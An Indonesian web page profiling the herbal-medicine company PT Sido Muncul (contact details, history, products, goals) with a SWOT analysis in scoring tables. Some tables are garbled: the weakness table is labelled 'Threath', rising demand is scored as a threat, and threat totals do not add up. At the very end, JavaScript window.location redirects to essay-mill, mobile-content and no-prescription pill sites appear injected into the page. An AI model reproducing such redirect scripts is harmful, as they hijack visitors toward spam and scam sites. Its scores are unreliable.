Analisa SWOT PT Sido Muncul

Profil PT. Sido Muncul

 

Profil PT. Sido Muncul

 

Alamat Pabrik Jamu PT. Sido Muncul :

Jl Soekarno Hatta Km 28 Kec Bergas – Klepu, Semarang-Indonesia.

Nomor Telepon 024 6580-559, 0298 523-515

Fax 024 6580-332, 0298 523-509

Email simuncul@indosat.net.id

 

Kantor Pemasaran PT. Sido Muncul :

Jl Cipete Raya No 81 Jakarta 12410, Indonesia.

Nomor Telepon 021 765 3535 Fax 765 6522.

Email marketing@sidomuncul.com

Humas / PR PT. Sido Muncul :

Jln Cipete Raya No 81 Jakarta Selatan, Indonesia 12410.

Website www.sidomuncul.com

 

 

Sejarah PT. Sido Muncul

PT. Sido Muncul bermula dari sebuah industri rumah tangga pada tahun 1940, dikelola oleh Ibu Rahkmat Sulistio di Yogyakarta, dan dibantu oleh tiga orang karyawan. Banyaknya permintaan terhadap kemasan jamu yang lebih praktis, mendorong beliau memproduksi jamu dalam bentuk yang praktis (serbuk), seiring dengan kepindahan beliau ke Semarang , maka pada tahun 1951 didirikan perusahan sederhana dengan nama Sido Muncul yang berarti “Impian yang terwujud” dengan lokasi di Jl. Mlaten Trenggulun. Dengan produk pertama dan andalan adalah Jamu Tolak Angin. Sehingga produk jamu buatan Ibu Rakhmat mulai mendapat tempat di hati masyarakat sekitar dan permintaah terhadap produk semakin meningkat.

Dalam perkembangannya, pabrik yang terletak di Jl. Mlaten Trenggulun ternyata tidak mampu lagi memenuhi kapasitas produksi yang besar akibat permintaan pasar yang terus meningkat, dan di tahun 1984 pabrik dipindahkan ke Lingkungan Industri Kecil di Jl. Kaligawe, Semarang. Untuk memenuhi permintaan konsumen yang terus bertambah, maka pabrik mulai dilengkapi dengan mesin-mesin modern. PT. Sido Muncul juga menambah jumlah karyawan sesuai dengan kapasitas yang dibutuhkan ( kini jumlahnya mencapai lebih dari 2000 orang ). Untuk mengantisipasi kemajuan dimasa datang, PT. Sido Muncul  membangun unit pabrik yang lebih besar dan modern. Maka dari itu pada tahun 1997 diadakan peletakan batu pertama pembangunan pabrik baru di Klepu, Ungaran oleh Sri Sultan Hamengkubuwono X dan disaksikan Direktur Jenderal Pengawasan Obat dan Makanan saat itu, Drs. Wisnu Kaltim.

Pabrik baru yang berlokasi di Klepu, Kec. Bergas, Ungaran, dengan luas 29 ha tersebut diresmikan oleh Menteri Kesehatan dan Kesejahteraan Sosial Republik Indonesia, dr. Achmad Sujudi pada tanggal 11 November 2000. Saat peresmian pabrik, PT. Sido Muncul sekaligus menerima dua sertifikat yaitu Cara Pembuatan Obat Tradisional yang Baik (CPOTB) dan Cara Pembuatan Obat yang Baik (CPOB) setara dengan farmasi, dan sertifikat inilah yang menjadikan PT Sido Muncul sebagai satu-satunya pabrik jamu berstandar farmasi. Lokasi pabrik sendiri terdiri dari bangunan pabrik seluas 7 hektar, lahan Agrowisata ,1,5 hektar, dan sisanya menjadi kawasan pendukung lingkungan pabrik.

Visi dan Misi Perusahaan

Visi :

Menjadi industri jamu yang dapat memberikan manfaat pada masyarakat dan lingkungan.

Misi :

a)   Meningkatkan mutu pelayanan di bidang herbal tradisional.

b)   Mengembangkan research/penelitian yang berhubungan dengan pengembangan pengobatan dengan bahan-bahan alami.

c)   Meningkatkan kesadaran masyarakat akan pentingnya membina kesehatan melalui pola hidup sehat, pemakaian bahan-bahan alami dan pengobatan secara tradisional.

d)  Ikut mendorong pemerintah/instansi resmi agar lebih berperan dalam pengembangan pengobatan tradisional.

 

Tujuan :

Meningkatkan profit untuk mengembangkan perusahaan dan untuk mencapai visi misi perusahaan.

 

Produk-Produk PT. Sido Muncul
     Kuku Bima
Type: Serbuk         Kuku Bima Ener-G
Type: Botol
     Kuku Bima Ginseng
Type: Serbuk         Kuku Bima TL
Type: Serbuk
     Kuku Bima TL Plus Tribulus
Type: Serbuk         Tolak Angin
Type: Saset
     Tolak Angin Anak
Type: Fls         Tolak Angin Ekstra Hangat
Type: Tablet
     Tolak Angin Flu
Type: Fls         Tolak Angin Permen
Type: Tablet Hisap

Sasaran konsumen

Menjaga loyalitas konsumen. Iklan juga digunakan untuk memperkuat brand Tolak Angin, supaya nama Tolak Angin ini melekat di dalam benak khalayak.

 

Sasaran penjualan

Menjaring konsumen baru dan terciptanya oenjualan yang meningkat dalam waktu dekat.

 

Sasaran SDM

Mengembangkan kemampuan, pada waktu-waktu tertemtu kepada karyawan diberikan kesempatan mengikuti pelatihan, kursus, maupun seminar. Untuk mendukung pengembangan, PT.Sido Muncul juga merekrut konsultan yang ahli dibidangnya, misalnya: apoteker, dokter umu, dokter gigi dan spesialis.

Dari kasus yang ada pada PT. Sido Muncul tersebut dapat dirumuskan analisis SWOT sebagai berikut:

Kuesioner Internal Factor Analysis Strategi Untuk Mengetahui Kekuatan (Strength)

Faktor Strategis

Nilai

Bobot

Rating

Skor

Produk yang terjangkau

4

0,23

3

0,69

Distribusi tersebar di seluruh Indonesia

3

0,18

3

0,54

Didukung oleh SDM yang handal

3

0,18

3

0,54

Fasilitas pabrik yang lengkap

3

0,18

3

0,54

Merupakan perusahaan jamu terbesar di Indonesia

4

0,23

4

0,92

Total

17

1

16

3,23

 

Ukuran pembobotan :                Ukuran Rating Kekuatan :

1 = Sedikit Penting                1= Sedikit Kuat

2 = Agak Penting                   2= Agak Kuat

3        = Penting                          3= Kuat

4 = Sangat Penting                4= Sangat Kuat

 

 

Kuesioner Internal Factor Analysis Strategi Untuk Mengetahui Kelemahan (Threath)

Faktor Strategis

Nilai

Bobot

Rating

Skor

Belum mempunyai alat pengering bahan baku

3

0,5

-3

-1,5

Proses produksi bergantung pada pasokan bahan baku pengepul

3

0,5

-2

-1

Total

6

1

-5

-2,5

Ukuran pembobotan :                Ukuran Rating Kelemahan :

1 = Sedikit Penting                -1= Sedikit Lemah

2 = Agak Penting                   -2= Agak Lemah

3 = Penting                             -3= Lemah

4 = Sangat Penting                -4= Sangat Lemah

 

Kuesioner Eksternal Factor Analysis Strategi Untuk Mengetahui Peluang (Opportunity)

Faktor Strategis

Nilai

Bobot

Rating

Skor

Kebutuhan tekonologi yang canggih untuk proses produksi

4

0,4

3

1,2

Selera masyarakat

3

0,3

3

0,9

Menjadi sponsor dalam berbagai promosi kesehatan

3

0,3

3

0,9

Total

10

1

9

3,0

Ukuran pembobotan :                Ukuran Rating Peluang :

1 = Sedikit Penting                1= Sedikit Berpeluang

2 = Agak Penting                   2= Agak Berpeluang

3 = Penting                             3= Berpeluang

4 = Sangat Penting                4= Sangat Berpeluang

 

Kuesioner Eksternal Factor Analysis Strategi Untuk Mengetahui Ancaman (Threath)

Faktor Strategis

Nilai

Bobot

Rating

Skor

Permintaan produk herbal terus meningkat

3

0,3

3

0,9

Pembiayaan proses produksi mahal

3

0,3

3

0,9

Bahan baku produksi tidak stabil

3

0,3

2

0,6

Total

9

0,9

11

2,4

Ukuran pembobotan :                Ukuran Rating Ancaman :

1 = Sedikit Penting                -1= Sedikit Mengancam

2 = Agak Penting                   -2= Agak Mengancam

3 = Penting                             -3= Mengancam

4 = Sangat Penting                -4= Sangat Mengancam

 

Dari hasil tabel diatas, maka dapat disimpulkan sebagai berikut:

  1.       Skor Kekuatan    =  3,23
  2.       Skor Kelemahan = -2,5
  3.       Skor Peluang       =  3,0
  4.       Skor Ancaman    = -2,4

contributed by coursework writing author http://assignmenthelponline.co.uk/coursework-writing/coursework-writing/

window.location = “http://essay-writ.org”;window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”; window.location = “http://cheap-pills-norx.com/search.htm?route=search&q=”;

Leave a Reply

Your email address will not be published. Required fields are marked *